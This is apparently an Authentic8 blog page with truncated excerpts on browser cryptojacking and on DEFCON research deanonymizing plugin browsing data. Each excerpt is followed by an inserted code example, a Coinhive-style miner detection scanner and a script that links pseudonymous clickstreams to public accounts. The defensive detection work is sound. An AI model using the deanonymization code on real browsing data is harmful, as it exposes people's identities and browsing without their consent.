Authentic8 Blog Author: Nicholas Espinoza

Nick is an engineer who supports the DoD, IC and LE communities in tackling tough problems in collection, analysis, and exploitation. He previously worked with Palantir, BAH, and Recorded Future.

Cryptojacking 101


As an end user, cryptojacking (cryptocurrency mining at someone else's expense) is a problem: someone is hogging your computing power and profiting from it directly, without your knowledge.

To the miner, at first glance, this looks like a victimless crime: it is a passive activity, the costs appear minimal, and the return is cryptocurrency that can be spent on the open, deep, and dark web.

However, mining this currency comes at a high cost to the cryptojacking victim: computational expense (CPU and GPU usage), electricity (Source), and time.

Clever companies and individuals are looking for ways to leverage other people's resources to mine cryptocurrency by embedding cryptomining scripts in websites serving anything from web stores to video streams.

Let's step through the mechanics, the economics, and potential countermeasures for browser-based cryptojacking.

The Mechanics of Cryptojacking

Cryptojacking is simple:

  • a user navigates to a website or service controlled by the miner,
  • a CoinHive or similar client-side JavaScript is
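The mechanics above, as an added example that is not part of the original post: a heuristic scanner that pulls every script out of a page's HTML and matches it against indicators of an embedded miner (a Coinhive-style loader, the miner's client API, a CryptoNight/WebAssembly payload, a pool endpoint). The indicator list, the weights, the threshold and the sample page (including its hostnames and the placeholder site key) are illustrative assumptions, not a vetted signature set; a real deployment would keep the list current and pair it with CPU-usage telemetry, since miners are routinely renamed and minified.

```javascript
// Added example (not from the Authentic8 post): heuristic detection of
// browser-based cryptojacking scripts in page HTML.
// Indicator patterns and weights are illustrative assumptions.
const MINER_INDICATORS = [
  { name: 'coinhive-loader',  re: /coinhive(?:\.min)?\.js/i,                         weight: 3 },
  { name: 'coinhive-api',     re: /CoinHive\.(?:Anonymous|User)\s*\(/,               weight: 3 },
  { name: 'cryptonight',      re: /cryptonight/i,                                    weight: 2 },
  { name: 'pool-endpoint',    re: /wss?:\/\/[^"'\s]*(?:stratum|pool)[^"'\s]*/i,     weight: 2 },
  { name: 'worker-spawn',     re: /new\s+Worker\s*\(/,                               weight: 1 },
  { name: 'wasm-instantiate', re: /WebAssembly\.(?:instantiate|compile)\s*\(/,       weight: 1 },
];

// Pull out every <script> element with its src (if any) and inline body.
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Score each script by the indicators it matches; a score at or above the
// threshold marks the script as a probable miner. A lone Worker or WebAssembly
// call is legitimate in plenty of pages, which is why those weigh little.
function scanForMiners(html, threshold = 3) {
  const findings = [];
  for (const s of extractScripts(html)) {
    const haystack = `${s.src || ''}\n${s.body}`;
    const hits = MINER_INDICATORS.filter((ind) => ind.re.test(haystack));
    if (hits.length === 0) continue;
    const score = hits.reduce((acc, h) => acc + h.weight, 0);
    findings.push({
      src: s.src,
      indicators: hits.map((h) => h.name),
      score,
      suspicious: score >= threshold,
    });
  }
  return findings;
}

function isPageCryptojacked(html, threshold = 3) {
  return scanForMiners(html, threshold).some((f) => f.suspicious);
}

// Constructed sample page (hostnames and site key are placeholders): one benign
// analytics script, a miner loaded from a third-party host, its inline start-up
// code, and a legitimate Worker that must not be flagged.
const SAMPLE_PAGE = `
<html><head>
<script src="https://cdn.analytics.example/track.js"></script>
<script src="https://miner-cdn.example/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.3 });
  miner.start();
</script>
<script>
  // legitimate use of a worker for image decoding
  const decoder = new Worker('/decode.js');
</script>
</head><body>Video stream</body></html>`;

const sampleFindings = scanForMiners(SAMPLE_PAGE);
console.log(JSON.stringify(sampleFindings, null, 2));
console.log('page cryptojacked:', isPageCryptojacked(SAMPLE_PAGE));
```

Running it on the sample page reports three scripts with indicators: the loader and the inline `CoinHive.Anonymous(...)` call both score 3 and are flagged, while the decoding Worker scores 1 and is left alone. Treat the output as a triage signal for a proxy or browser extension, not as proof; a miner that is hosted under a neutral filename and obfuscated will only trip the low-weight indicators, which is where CPU monitoring has to take over.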

Research: Deanonymizing Browser Data Made Easy


This year at DEFCON in Las Vegas, investigative journalist Svea Eckert and researcher Andreas Dewes demonstrated how to deanonymize, with relative ease, browsing datasets they had acquired through major browser plugin providers.

Their research resulted in a handful of significant findings:

  • 10 “privacy” plugins provided the most voluminous data sets.
  • Data provided is very granular.
  • Contrary to popular belief, the deanonymization techniques aren't novel; most of them are pattern matching rather than complex mathematics.
  • Using Publicly Available Information (PAI) for correlation makes deanonymization much simpler.

Let’s dig into their research [PDF] to identify the risks involved with plugin usage and techniques utilized for data exploitation. One notable finding even affected an active law enforcement investigation.
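The two technique families the findings above describe, pattern matching and correlation with Publicly Available Information, as an added example that is not part of the original post or the researchers' code. It runs over a constructed clickstream keyed by a pseudonymous user ID. The first pass looks for URLs that only the account owner would visit (the site layouts matched, `social.example/<handle>/analytics` and `mail.example/u/<user>/inbox`, are hypothetical). The second pass correlates each pseudonym's visited URLs with links that known public accounts posted, weighting each match by how rare the URL is across the dataset, and refuses to name anyone when the evidence is thin or two candidates tie. All records and accounts are invented.

```javascript
// Added example (not from the Authentic8 post or the researchers' work):
// deanonymizing a pseudonymous clickstream by pattern matching and by
// correlation with public data. URL patterns and data are constructed.

// Pages a visitor normally reaches only for their own account (hypothetical layouts).
const SELF_REFERENCE_PATTERNS = [
  /^https:\/\/social\.example\/([A-Za-z0-9_]+)\/analytics\b/,
  /^https:\/\/mail\.example\/u\/([A-Za-z0-9_.]+)\/inbox\b/,
];

function matchSelfReference(url) {
  for (const re of SELF_REFERENCE_PATTERNS) {
    const m = re.exec(url);
    if (m) return { handle: m[1], method: 'self-referencing-url', evidence: [url] };
  }
  return null;
}

// pseudonym -> Set of distinct URLs visited
function groupByUser(records) {
  const byUser = new Map();
  for (const r of records) {
    if (!byUser.has(r.user)) byUser.set(r.user, new Set());
    byUser.get(r.user).add(r.url);
  }
  return byUser;
}

// URLs visited by many pseudonyms carry little information, so each match is
// weighted by 1 / (number of pseudonyms that visited it).
function urlPopularity(byUser) {
  const pop = new Map();
  for (const urls of byUser.values()) {
    for (const u of urls) pop.set(u, (pop.get(u) || 0) + 1);
  }
  return pop;
}

// Score every public account by the rarity-weighted overlap between the links
// it posted and the URLs this pseudonym visited. Return null if the best score
// is below the threshold or if the top two candidates tie.
function correlateWithPublicPosts(visited, publicPosts, pop, minScore) {
  const scored = Object.entries(publicPosts)
    .map(([handle, posted]) => {
      let score = 0;
      const evidence = [];
      for (const u of posted) {
        if (visited.has(u)) { score += 1 / pop.get(u); evidence.push(u); }
      }
      return { handle, score, evidence };
    })
    .sort((a, b) => b.score - a.score);
  const [best, second] = scored;
  if (!best || best.score < minScore) return null;
  if (second && second.score === best.score) return null; // ambiguous: do not guess
  return { handle: best.handle, method: 'link-correlation', score: best.score, evidence: best.evidence };
}

function deanonymize(records, publicPosts, { minScore = 2 } = {}) {
  const byUser = groupByUser(records);
  const pop = urlPopularity(byUser);
  const resolved = {};
  for (const [user, visited] of byUser) {
    let hit = null;
    for (const url of visited) { hit = matchSelfReference(url); if (hit) break; }
    if (!hit) hit = correlateWithPublicPosts(visited, publicPosts, pop, minScore);
    if (hit) resolved[user] = hit;
  }
  return resolved;
}

// Constructed clickstream: pseudonym + URL, as a plugin vendor's dataset might look.
const CLICKSTREAM = [
  { user: 'u1', url: 'https://social.example/alice_k/analytics' },
  { user: 'u1', url: 'https://news.example/story/1' },
  { user: 'u2', url: 'https://news.example/story/2' },
  { user: 'u2', url: 'https://blog.example/post/77' },
  { user: 'u2', url: 'https://shop.example/item/9' },
  { user: 'u3', url: 'https://news.example/story/1' },
];

// Constructed PAI: links each public account is known to have posted.
const PUBLIC_POSTS = {
  bob_m: ['https://news.example/story/2', 'https://blog.example/post/77', 'https://shop.example/item/9'],
  carol: ['https://news.example/story/1'],
  dave:  ['https://news.example/story/2'],
};

console.log(JSON.stringify(deanonymize(CLICKSTREAM, PUBLIC_POSTS), null, 2));
```

On this data `u1` is named by a single self-referencing URL, `u2` is tied to `bob_m` because three distinct, rare URLs match that account's posts and no other account comes close, and `u3` stays unresolved: its only URL is a popular one that two pseudonyms visited and matches only one posted link, which is exactly the low-evidence case a careful analyst should refuse to call.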

Browser Plugins as Data Providers

The security implications of using browser plugins are extensive. Risks abound, from download and installation, through settings and permissions, to the possible monetization of user data.

One data provider identified in the research was Web of Trust (WOT) - a plugin installed